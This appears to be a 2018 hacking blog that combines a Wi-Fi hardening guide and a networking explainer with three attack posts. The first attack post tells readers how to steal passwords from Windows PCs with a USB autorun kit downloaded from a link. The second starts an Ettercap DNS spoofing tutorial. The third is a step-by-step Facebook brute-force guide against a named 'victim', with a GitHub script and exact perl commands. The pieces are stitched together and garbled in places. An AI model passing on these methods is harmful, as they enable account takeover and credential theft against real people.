Friday, 28 September 2018

Hack Proof Wifi (Security)

 

Enable WPA2 Wireless Encryption; Create a Strong SSID Network Name and Preshared Key

If you aren't using Wi-Fi Protected Access (WPA2) encryption to protect yourwireless network, then you might as well leave your front door wide open because hackers can virtually walk right into your network. If you're using outdated Wired Equivalent Privacy (WEP) security, which is easily cracked in seconds by most hackers, you should consider upgrading to WPA2. Older routers may need afirmware upgrade to add WPA2 functionality. Check your router manufacturer's manual to learn how to enable WPA2 wireless encryption on your router.
You will also need to make a strong SSID (wireless network name). If you are using your router's default network name (i.e. Linksys, Netgear, DLINK, etc.), then you are making it easier for hackers to hack your network. Using a default SSID or a common one helps hackers in their quest to crack your encryption because they can use prebuilt rainbow tables associated with common SSID names to crack your wireless encryption.
Create a lengthy and random SSID name even though it might be hard to remember. You should also use a strong password for your preshared key to further discourage hacking attempts.

Turn On Your Wireless Router's Firewall

If you haven't already done so, you should consider enabling your wireless router's built-in firewall. Enabling the firewall can help to make your network less visible to hackers looking for targets on the internet. Many router-based firewalls have a "stealth mode" that you can enable to help reduce your network's visibility. You will also want to test your firewall to ensure that you have configured it correctly.

Use an encrypted personal VPN service at the router level

Virtual private networks used to be a luxury that only large corporations could afford. Now you can buy your own personal VPN service for a small monthly fee. A personal VPN is one of the biggest roadblocks you can throw at a hacker.
A personal VPN has the capability to anonymize your true location with a proxied IP address and can also put up a wall of strong encryption to protect your network traffic. You can purchase personal VPN service from vendors such as WiTopia,StrongVPN, and others for as little as $10 a month or less as of January 2018.
If your router supports personal VPN service at the router level, then this would be the best way to implement a personal VPN as it allows you to encrypt all traffic entering and leaving your network without the hassle of setting up VPN client software on your computers. Using the personal VPN service at the router level also takes the encryption process burden off of your client PCs and other devices. If you want to use a personal VPN at the router level, check to see if your router is VPN-capable. Buffalo Technologies has several routers with this capability, as do other router manufacturers.

Disable the Admin via Wireless Feature on Your Router

Another way to help prevent hackers from messing with your wireless router is to disable the admin via wireless setting. When you disable the admin via wireless feature on your router it makes it so that only someone who is physically connected to your router via an Ethernet cable can access the admin features of your wireless router. This helps to prevent someone from driving by your house and accessing the administrative functions of your router if they've compromised your Wi-Fi encryption.

Given enough time and resources, a hacker might still be able to hack into your network, but taking the steps above will make your network a harder target, hopefully frustrating hackers and causing them to move on to an easier target

Networking


Networking, also known as computer networking, is the practice of transporting and exchanging data between nodes over a shared medium in an information system. Networking comprises not only the design, construction and use of a network, but also the management, maintenance and operation of the network infrastructure, software and policies.

Computer networking enables devices and endpoints to be connected to each other on a local area network (LAN) or to a larger network, such as the internet or a private wide area network (WAN). This is an essential function for service providers, businesses and consumers worldwide to share resources, use or offer services, and communicate. Networking facilitates everything from telephone calls to text messaging to streaming video to the internet of things (IoT).
The level of skill required to operate a network directly correlates to the complexity of a given network. For example, a large enterprise may have thousands of nodes and rigorous security requirements, such as end-to-end encryption, requiring specialized network administrators to oversee the network.
At the other end of the spectrum, a layperson may set up and perform basic troubleshooting for a home Wi-Fi network with a short instruction manual. Both examples constitute computer networking.

Types of networking

There are two primary types of computer networking: wired networking and wireless networking.
Wired networking requires the use of a physical medium for transport between nodes. Copper-based Ethernet cabling, popular due to its low cost and durability, is commonly used for digital communications in businesses and homes. Alternatively, optical fiber is used to transport data over greater distances and at faster speeds, but it has several tradeoffs, including higher costs and more fragile components.
Wireless networking uses radio waves to transport data over the air, enabling devices to be connected to a network without any cabling. Wireless LANs are the most well-known and widely deployed form of wireless networking. Alternatives include microwave, satellite, cellular and Bluetooth, among others.
As a general rule, wired networking offers greater speed, reliability and security compared to wireless networks; wireless networking tends to provide more flexibility, mobility and scalability.
It should be noted that these types of networking concern the physical layer of the network. Networking can also be classified according to how it's built and designed, encompassing approaches that include software-defined networking (SDN) or overlay networks. Networking can also be categorized by environment and scale, such as LAN, campus, WAN, data center networks or storage area networks.

Components of networking

Computer networking requires the use of physical network infrastructure -- includingswitches, routers and wireless access points -- and the underlying firmware that operates such equipment. Other components include the software necessary to monitor,manage and secure the network.
Additionally, networks rely on the use of standard protocols to uniformly perform discrete functions or communicate different types of data, regardless of the underlying hardware.
For example, voice over IP (VoIP) can transport IP telephony traffic to any endpoint that supports the protocol. HTTP provides a common way for browsers to display webpages. The internet protocol suite, also known as TCP/IP, is a family of protocols responsible for transporting data and services over an IP-based network.

Steal Information With A USB Drive


This Is Only For Educational Purposes Only.

To Download Tools Just Visit 

https://drive.google.com/open?id=1G_fmFLoU3RkCi7qeTG60ijTCtbjh9emH

Hello All.
The First Thing You Need Is A windows Machine
Today I will Show You How To Steal All Important Passwords From A Computer Through A Usb Drive Using Small Tools.
To Do This First download the tools From The Above Link .
Then Extract these File .
Copy All these Items to your Usb Drive
Note!!  Your USB Must Be Empty Before Starting This Task.
You Will Make A autorun File For This Attack.
Then Just Remove your Usb Drive .
Just Put Your Usb Drive In Your Own PC for A small Test .
 The Usb Will Show You all the hidden Passwords in your PC .
This Attack is All called Keylogger Attack.
 Note :- This Attack Is Only Workable For Windows Machine.

Thank You

DNS Spoofing

!!! For Educational Purposes Only!!!

Tutorial DNS Spoofing 

Greetings my fellow hackers. As you may have noticed by my lack of posts, I've been away for a while working on a big project with a team (which won't be finished anytime soon), and I have also been putting together a small side project for NullByte that I will be announcing soon. So sorry if I've been lagging, I'm back now and I'm finally making a tutorial. I know that DNS Spoofing has been covered here already by OTW but I feel like I have to make my own input on this. I'll be using Ettercap so that's something original, am I right? Alright, let's get to it. What Is DNS Spoofing? DNS Spoofing (sometimes referred to as DNS Cache Poisoning) is an attack whereby a host with no authority is directing a Domain Name Server (DNS) and all of its requests. This basically means that an attacker could redirect all DNS requests, and thus all traffic, to his (or her) machine, manipulating it in a malicious way and possibly stealing data that passes across. This is one of the more dangerous attacks as it is very difficult to detect, but today I will show you both how to perform it and how to detect if it is being performed by somebody else on your network.

 Step 1: 

Preparation Let's start by booting up Kali Linux, whether it's a Virtual Machine (VM), a native boot, or a dual boot. If you haven't got Kali yet (which you should by now, granted that you're on this website) go get it on the official website. Make sure you have a working internet connection before you continue and make sure that you are on the same network as your target. This is a LAN (or WLAN) attack and so both the attacker and victim must have the same network gateway. Let me point out in advance that the victim could be running any operating system, it does not matter
Complete PDF LINK:> One Step Away

How to hack a facebook Account using Bruteforce

Using Kali Linux


First of all you have to download kali linux
thne you have to boot into the kali linux machine What ever you use laptop or PC.

1) Information Gathering.


Then You have to Gether All information about Your Victim . You have to Make A WordList .
There are several methods to make a wordlist But I suggest you To You to use your custom WordList
The Wordlsit Contain All the possible combination of your Victim Password
You Have to Find all the Information ABout Your Victim To make A strong Wordlist
Make Wordlist about of 2 to 200000 password combinations.
Note (If Your Wordlist does't Contain the Password Then You are unable to hack a account)

2) Email/User Name Of your Victim

As you know about user name and email of a facebook user if you don't have email or your victim
then there is another way to find user name of your victim
Steps Are as follows.
* The First thing you need to open facebook using your browser or mobile api.
then you have to copy the profile lif of the victim to notepad. Your Link is like that
      Condition 1
"https://www.facebook.com/10000215481213"

      Condition 2
"https://www.facebook.com/victimUName"


In the First Condition your victim user name is "10000215481213"
In the Second Condition Your Victime Uswe name is "victimUName132"
You have to copy your victime user name to your Notepad/Leafpad or What ever you use.

3) Application

YOu have to download the facebook bruteforce script from github
The Link Is :-https://github.com/ElbertShahzaib/FbBruter

4) Run Attack

the most important step in this attack
Now you Have to Goto Your terminal and goto the directory where you download the bruteforce script
Example :- "cd /root/Desktop/fbbruter"
You have to just copy this command to your terminal and press enter
THe you are in the Directory of the Bruteforce script But You have to run perl script .
Now You have to run this command in the same terminal
         perl facebook.pl "User name of victim ) "Wordlist path "
Example :- perl facebook.pl 10000215481213 /root/Desktop/Wordlist.txt
Then Press Enter
Set back and wait for password.
       

            Using Termux

Termux is the widely hackinh app used in the android plateform
The same things you need to do
But in the termux perl script in not install you have to install it By using this command
"pkg install perl"
* First of all make a word list.
* Download the bruteforce script.
* Goto Direcotry of the Script
* Run Comand As Same In kali linux terminal